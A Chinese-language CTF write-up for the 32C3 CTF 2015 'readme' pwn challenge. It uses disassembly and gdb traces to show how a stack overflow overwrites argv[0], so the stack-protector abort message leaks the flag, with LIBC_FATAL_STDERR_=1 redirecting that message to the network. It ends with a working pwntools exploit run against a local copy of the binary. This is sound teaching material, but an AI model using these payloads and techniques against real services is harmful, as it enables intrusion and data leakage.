# 6.1.14 pwn 32C3CTF2015 readme - [题目复现](#题目复现) - [题目解析](#题目解析) - [漏洞利用](#漏洞利用) - [参考资料](#参考资料) [下载文件](../src/writeup/6.1.14_pwn_32c3ctf2015_readme) ## 题目复现 ``` $ file readme.bin readme.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7d3dcaa17ebe1662eec1900f735765bd990742f9, stripped $ checksec -f readme.bin RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE No RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 1 2 readme.bin ``` 开启了 Canary。 flag 就藏在二进制文件中的 .data 段上: ``` $ rabin2 -z readme.bin | grep 32C3 000 0x00000d20 0x00600d20 31 32 (.data) ascii 32C3_TheServerHasTheFlagHere... ``` 程序接收两次输入,并打印出第一次输入的字符串(看起来并没有格式化字符串漏洞): ``` $ ./readme.bin Hello! What's your name? %p.%p.%p.%p Nice to meet you, %p.%p.%p.%p. Please overwrite the flag: %d.%d.%d.%d Thank you, bye! $ python -c 'print "A"*300 + "\n" + "B"' > crash_input $ ./readme.bin < crash_input Hello! What's your name? Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. Please overwrite the flag: Thank you, bye! *** stack smashing detected ***: ./readme.bin terminated Aborted (core dumped) $ python -c 'print "A" + "\n" + "B"*300' | ./readme.bin Hello! What's your name? Nice to meet you, A. Please overwrite the flag: Thank you, bye! ``` 第一次输入的字符串过多会导致栈冲突的问题,第二次的输入似乎就没有什么影响。 感觉和 6.1.13 那题一样,都是需要利用 `__stack_chk_fail()` 打印 flag(参考章节 4.12)。但这一题是动态链接程序,因为 libc-2.25 版本的更新,使 `__stack_chk_fail()` 不能用了。所以为了复现,我们选择Ubuntu 16.04,版本是 libc-2.23。 ## 题目解析 来看一下程序的逻辑: ``` [0x004006ee]> pdf @ sub.Hello___What_s_your_name_7e0 / (fcn) sub.Hello___What_s_your_name_7e0 206 | sub.Hello___What_s_your_name_7e0 (); | ; var int local_108h @ rsp+0x108 | ; CALL XREF from 0x004006e2 (main) | 0x004007e0 55 push rbp | 0x004007e1 be34094000 mov esi, str.Hello___What_s_your_name ; 0x400934 ; "Hello!\nWhat's your name? " | 0x004007e6 bf01000000 mov edi, 1 | 0x004007eb 53 push rbx ; 先保存下 rbx 的值,然后 rbx 被用作计数器 | 0x004007ec 4881ec180100. sub rsp, 0x118 ; rsp = rsp - 0x118 | 0x004007f3 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40 | 0x004007fc 488984240801. mov qword [local_108h], rax ; Canary = [rsp + 0x108] | 0x00400804 31c0 xor eax, eax | 0x00400806 e8a5feffff call sym.imp.__printf_chk | 0x0040080b 4889e7 mov rdi, rsp ; rdi = rsp,所以缓冲区大小 0x108 | 0x0040080e e8adfeffff call sym.imp._IO_gets ; 第一次输入,读取字符串 | 0x00400813 4885c0 test rax, rax | ,=< 0x00400816 0f8483000000 je 0x40089f | | 0x0040081c 4889e2 mov rdx, rsp | | 0x0040081f be60094000 mov esi, str.Nice_to_meet_you___s.__Please_overwrite_the_flag: ; 0x400960 ; "Nice to meet you, %s.\nPlease overwrite the flag: " | | 0x00400824 bf01000000 mov edi, 1 | | 0x00400829 31c0 xor eax, eax | | 0x0040082b 31db xor ebx, ebx | | 0x0040082d e87efeffff call sym.imp.__printf_chk | | 0x00400832 660f1f440000 nop word [rax + rax] | | ; JMP XREF from 0x0040085c (sub.Hello___What_s_your_name_7e0) | .--> 0x00400838 488b3d090520. mov rdi, qword [obj.stdin] ; [0x600d48:8]=0 ; 临时存储区 | :| 0x0040083f e85cfeffff call sym.imp._IO_getc ; 第二次输入,每次读取一个字符 | :| 0x00400844 83f8ff cmp eax, 0xffffffffffffffff | ,===< 0x00400847 7456 je 0x40089f | |:| 0x00400849 83f80a cmp eax, 0xa ; 10 ; 是否为换行符 | ,====< 0x0040084c 7412 je 0x400860 | ||:| 0x0040084e 8883200d6000 mov byte [rbx + str.32C3_TheServerHasTheFlagHere...], al ; 将字符写入到原 flag+rbx 的地方 | ||:| 0x00400854 4883c301 add rbx, 1 ; 计数 + 1 | ||:| 0x00400858 4883fb20 cmp rbx, 0x20 ; 32 ; 最多读入 0x20 个字符 | ||`==< 0x0040085c 75da jne 0x400838 ; 继续循环 | ||,==< 0x0040085e eb18 jmp 0x400878 ; 结束循环 | |||| ; JMP XREF from 0x0040084c (sub.Hello___What_s_your_name_7e0) | `----> 0x00400860 ba20000000 mov edx, 0x20 ; 32 | ||| 0x00400865 4863fb movsxd rdi, ebx | ||| 0x00400868 31f6 xor esi, esi ; rsi = 0 | ||| 0x0040086a 29da sub edx, ebx ; 0x20 - 计数 | ||| 0x0040086c 4881c7200d60. add rdi, str.32C3_TheServerHasTheFlagHere... ; rdi = flag+rbx | ||| 0x00400873 e8f8fdffff call sym.imp.memset ; void *memset(void *s, int c ; 将剩余的 flag 覆盖为 0 | ||| ; JMP XREF from 0x0040085e (sub.Hello___What_s_your_name_7e0) | |`--> 0x00400878 bf4e094000 mov edi, str.Thank_you__bye ; 0x40094e ; "Thank you, bye! | | | 0x0040087d e8befdffff call sym.imp.puts ; int puts(const char *s) | | | 0x00400882 488b84240801. mov rax, qword [local_108h] ; [0x108:8]=-1 ; 264 | | | 0x0040088a 644833042528. xor rax, qword fs:[0x28] | |,==< 0x00400893 7514 jne 0x4008a9 ; 验证 Canary | ||| 0x00400895 4881c4180100. add rsp, 0x118 | ||| 0x0040089c 5b pop rbx | ||| 0x0040089d 5d pop rbp | ||| 0x0040089e c3 ret | ||| ; JMP XREF from 0x00400816 (sub.Hello___What_s_your_name_7e0) | ||| ; JMP XREF from 0x00400847 (sub.Hello___What_s_your_name_7e0) | `-`-> 0x0040089f bf01000000 mov edi, 1 | | 0x004008a4 e887fdffff call sym.imp._exit ; void _exit(int status) | | ; JMP XREF from 0x00400893 (sub.Hello___What_s_your_name_7e0) \ `--> 0x004008a9 e8a2fdffff call sym.imp.__stack_chk_fail ; void __stack_chk_fail(voi ; 验证失败时调用 [0x004006ee]> px 0x20 @ str.32C3_TheServerHasTheFlagHere... - offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 0x00600d20 3332 4333 5f54 6865 5365 7276 6572 4861 32C3_TheServerHa 0x00600d30 7354 6865 466c 6167 4865 7265 2e2e 2e00 sTheFlagHere.... ``` 看注释已经很明显了,第一次的输入需要我们触发栈溢出,使程序调用 `__stack_chk_fail()`,并打印出 `argv[0]`。第二次的输入将覆盖掉位于 `0x00600d20` 的 flag。 ## 漏洞利用 那么问题来了,如果 flag 被覆盖掉了,那还怎样将其打印出来。这就涉及到了 ELF 文件的映射问题,我们知道 x86-64 程序的映射是从 `0x400000` 开始的: ``` $ ld --verbose | grep __executable_start PROVIDE (__executable_start = SEGMENT_START("text-segment", 0x400000)); . = SEGMENT_START("text-segment", 0x400000) + SIZEOF_HEADERS; ``` 在调试时我们又发现 readme.bin 被映射到下面的两个地址中: ``` gdb-peda$ b *0x0040080e Breakpoint 1 at 0x40080e gdb-peda$ r gdb-peda$ vmmap readme.bin Start End Perm Name 0x00400000 0x00401000 r-xp /home/firmyy/readme.bin 0x00600000 0x00601000 rw-p /home/firmyy/readme.bin ``` 所以只要在二进制文件 `0x00000000~0x00001000` 范围内的内容都会被映射到内存中,分别以 `0x600000` 和 `0x400000` 作为起始地址 。flag 在 `0x00000d20`,所以会在内存中出现两次,分别位于 `0x00600d20` 和 `0x00400d20`: ``` gdb-peda$ find 32C3 Searching for '32C3' in: None ranges Found 2 results, display max 2 items: readme.bin : 0x400d20 ("32C3_TheServerHasTheFlagHere...") readme.bin : 0x600d20 ("32C3_TheServerHasTheFlagHere...") ``` 所以即使 `0x00600d20` 的 flag 被覆盖了,`0x00400d20` 的 flag 依然存在。 让我们来找出 `argv[0]` 距离栈的距离: ``` gdb-peda$ find /home/firmyy/readme.bin Searching for '/home/firmyy/readme.bin' in: None ranges Found 3 results, display max 3 items: [stack] : 0x7fffffffe097 ("/home/firmyy/readme.bin") [stack] : 0x7fffffffef9f ("/home/firmyy/readme.bin") [stack] : 0x7fffffffefe0 ("/home/firmyy/readme.bin") gdb-peda$ find 0x7fffffffe097 Searching for '0x7fffffffe097' in: None ranges Found 2 results, display max 2 items: libc : 0x7ffff7dd23d8 --> 0x7fffffffe097 ("/home/firmyy/readme.bin") [stack] : 0x7fffffffdc78 --> 0x7fffffffe097 ("/home/firmyy/readme.bin") gdb-peda$ x/10gx 0x7fffffffdc78 0x7fffffffdc78: 0x00007fffffffe097 0x0000000000000000 0x7fffffffdc88: 0x00007fffffffe0af 0x00007fffffffe0ba 0x7fffffffdc98: 0x00007fffffffe0cf 0x00007fffffffe0e6 0x7fffffffdca8: 0x00007fffffffe0f8 0x00007fffffffe12a 0x7fffffffdcb8: 0x00007fffffffe142 0x00007fffffffe158 gdb-peda$ x/10s 0x00007fffffffe097 0x7fffffffe097: "/home/firmyy/readme.bin" 0x7fffffffe0af: "XDG_VTNR=7" 0x7fffffffe0ba: "LC_PAPER=zh_CN.UTF-8" 0x7fffffffe0cf: "LC_ADDRESS=zh_CN.UTF-8" 0x7fffffffe0e6: "XDG_SESSION_ID=c1" 0x7fffffffe0f8: "XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/firmyy" 0x7fffffffe12a: "LC_MONETARY=zh_CN.UTF-8" 0x7fffffffe142: "CLUTTER_IM_MODULE=xim" 0x7fffffffe158: "SESSION=ubuntu" 0x7fffffffe167: "GPG_AGENT_INFO=/home/firmyy/.gnupg/S.gpg-agent:0:1" gdb-peda$ distance $rsp 0x7fffffffdc78 From 0x7fffffffda60 to 0x7fffffffdc78: 536 bytes, 134 dwords ``` `536=0x218` 个字节。第一次尝试: ```python from pwn import * io = remote("127.0.0.1", 10001) payload_1 = "A"*0x218 + p64(0x400d20) io.sendline(payload_1) payload_2 = "A"*4 io.sendline(payload_2) print io.recvall() ``` 在第一个终端里执行下面的命令,相当于远程服务器,并且将 stderr 重定向到 stdout: ``` $ socat tcp4-listen:10001,reuseaddr,fork exec:./readme.bin,stderr ``` 然后在第二个终端里执行 exp: ``` $ python exp.py [+] Opening connection to 127.0.0.1 on port 10001: Done [+] Receiving all data: Done (627B) [*] Closed connection to 127.0.0.1 port 10001 Hello! What's your name? Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @. Please overwrite the flag: Thank you, bye! ``` 咦,flag 并没有在我们执行 exp 的终端里打印出来,反而是打印在了执行程序的终端里: ``` $ socat tcp4-listen:10001,reuseaddr,fork exec:./readme.bin,stderr *** stack smashing detected ***: 32C3_TheServerHasTheFlagHere... terminated ``` 所以我们需要做点事情,让远程服务器上的错误信息通过网络传到我们的终端里。即利用第二次的输入,将 `LIBC_FATAL_STDERR_=1` 写入到环境变量中。结果如下: ``` gdb-peda$ x/10gx $rsp+0x218 0x7fffffffdcd8: 0x0000000000400d20 0x0000000000000000 0x7fffffffdce8: 0x0000000000600d20 0x00007fffffffe100 0x7fffffffdcf8: 0x00007fffffffe123 0x00007fffffffe155 0x7fffffffdd08: 0x00007fffffffe181 0x00007fffffffe19f 0x7fffffffdd18: 0x00007fffffffe1bf 0x00007fffffffe1df gdb-peda$ x/s 0x400d20 0x400d20: "32C3_TheServerHasTheFlagHere..." gdb-peda$ x/s 0x600d20 0x600d20: "LIBC_FATAL_STDERR_=1" ``` 函数 `__GI___libc_secure_getenv` 成功获取到了环境变量 `LIBC_FATAL_STDERR_` 的值 `1`: ``` gdb-peda$ ni [----------------------------------registers-----------------------------------] RAX: 0x600d33 --> 0x31 ('1') RBX: 0x7ffff7b9c49f ("*** %s ***: %s terminated\n") RCX: 0xe RDX: 0x0 RSI: 0x7ffff7b9ab8e ("BC_FATAL_STDERR_") RDI: 0x600d22 ("BC_FATAL_STDERR_=1") RBP: 0x7fffffffda80 --> 0x7ffff7b9c481 ("stack smashing detected") RSP: 0x7fffffffd9f0 --> 0x0 RIP: 0x7ffff7a8455a (<__libc_message+74>: test rax,rax) R8 : 0x1010 R9 : 0x24a R10: 0x1c7 R11: 0x0 R12: 0x7ffff7b9ac35 ("") R13: 0x7fffffffdcd0 ("AAAAAAAA \r@") R14: 0x0 R15: 0x1 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7a8454a <__libc_message+58>: mov DWORD PTR [rbp-0x78],0x10 0x7ffff7a84551 <__libc_message+65>: mov QWORD PTR [rbp-0x68],rax 0x7ffff7a84555 <__libc_message+69>: call 0x7ffff7a46ef0 <__GI___libc_secure_getenv> => 0x7ffff7a8455a <__libc_message+74>: test rax,rax 0x7ffff7a8455d <__libc_message+77>: je 0x7ffff7a84568 <__libc_message+88> 0x7ffff7a8455f <__libc_message+79>: cmp BYTE PTR [rax],0x0 0x7ffff7a84562 <__libc_message+82>: jne 0x7ffff7a846f7 <__libc_message+487> 0x7ffff7a84568 <__libc_message+88>: mov esi,0x902 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffd9f0 --> 0x0 0008| 0x7fffffffd9f8 --> 0x0 0016| 0x7fffffffda00 --> 0x0 0024| 0x7fffffffda08 --> 0x10 0032| 0x7fffffffda10 --> 0x7fffffffda90 --> 0x14 0040| 0x7fffffffda18 --> 0x7fffffffda20 --> 0x7ffff7dd2620 --> 0xfbad2887 0048| 0x7fffffffda20 --> 0x7ffff7dd2620 --> 0xfbad2887 0056| 0x7fffffffda28 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value __libc_message (do_abort=do_abort@entry=0x1, fmt=fmt@entry=0x7ffff7b9c49f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:81 81 ../sysdeps/posix/libc_fatal.c: No such file or directory. ``` Bingo!!! ``` $ python exp.py [+] Opening connection to 127.0.0.1 on port 10001: Done [+] Receiving all data: Done (703B) [*] Closed connection to 127.0.0.1 port 10001 Hello! What's your name? Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @. Please overwrite the flag: Thank you, bye! *** stack smashing detected ***: 32C3_TheServerHasTheFlagHere... terminated ``` #### exploit 最终的 exp 如下: ```python from pwn import * io = remote("127.0.0.1", 10001) #io = process('./readme.bin') #context.log_level = 'debug' payload_1 = "A"*0x218 + p64(0x400d20) + p64(0) + p64(0x600d20) io.sendline(payload_1) payload_2 = "LIBC_FATAL_STDERR_=1" io.sendline(payload_2) print io.recvall() ``` ## 参考资料 - https://ctftime.org/task/1958 - https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/pwn/readme-200